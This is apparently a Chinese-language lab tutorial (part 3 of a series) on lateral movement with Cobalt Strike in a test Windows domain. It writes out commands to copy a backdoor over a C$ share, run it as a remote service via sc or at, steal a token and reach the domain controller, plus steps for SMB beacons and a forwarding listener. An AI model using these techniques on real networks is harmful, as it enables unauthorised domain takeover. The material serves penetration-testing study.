Cobalt Strike 内网横向渗透获取权限（子篇3）

域内环境

系统	IP	备注
kali	192.168.0.134	teamserver
server 2008r2	10.10.10.4	dc域控
server 2008r2 （database1）	192.168.0.163  10.10.10.6	本次测试的重点
win7	192.168.0.130  10.10.10.5（内网ip）	victim被控端

6.内网横向渗透获取权限

    6.1代码执行的方法

     方法一  系统权限获得

     shell copy C:\Users\moonsec.TEST1\http.exe  \\database1\C$\WINDOWS\TEMP\http.exe

     shell sc \\host create name binpath=c:\windows\temp\file.exe   

     shell sc  \\host start name

     shell sc \\host delete name

    方法二  当前权限执行

     shell net time \\host

     shell at \\host HH:MM c:\path\to\bad.exe

    窃取标记   

    steal  token 2760

    验证是否可以攻击域控

    shell dir \\dc\c$

被控端主机beacon进来

 派生一个smb-beacon会话，内网的话最好用smb来做，它可以绕过一些防火墙

 会话sleep设置为0

 这边连接过来了，拿这个做渗透

 看一下当前的权限和内网的信任主机 shell whoami 和net view

 查看TEST1域下的所有信任主机

 

 方法一 SC服务获取权限   

攻击database1域 因为moonsec是它的管理员，可以访问它  

 生成一个后门  

 

 把它上传到被控端

 上传到Users目录下

 把当前文件复制到远程的database1域里面     

 创建一个a1的服务，服务名最好和后面的文件名一样 

 启动sc服务的a1文件

 这样的话就有了一台主机 

 现在可以删除服务，但是不会丢，已经加载到内存里面了

 方法二   当前权限执行  

创建后门              

 

 

 同样如方法一上传，然后复制到主机里面

这个时候多了一台

 这个时候又多了一台

 为了节约时间，会话时间设置为0

 

可以看到当前为系统权限

 看看域管理员是否有在进程列表里面, 如果在的话进行窃取标记     

 

 那么就可以访问域控dc的c盘啦   

 

 如何跟域控服务器交互？                

     kali和域控不在一个ip段 不能交互               

     所以要用到转发监听器     这里可以把它理解为一个代理        

 

 这边就会启动转发服务   

 新建一个后门        

 记住一定要选择之前设定的转发器名字，否则没用

 

 把它上传到这台主机中

 upload到temp目录下

复制到dc域中

 看看能不能访问dc域的时间

然后启动它，建立连接，就有了dc的系统权限

这个时候可以进到里面来

shell dir

现在可以看一下视图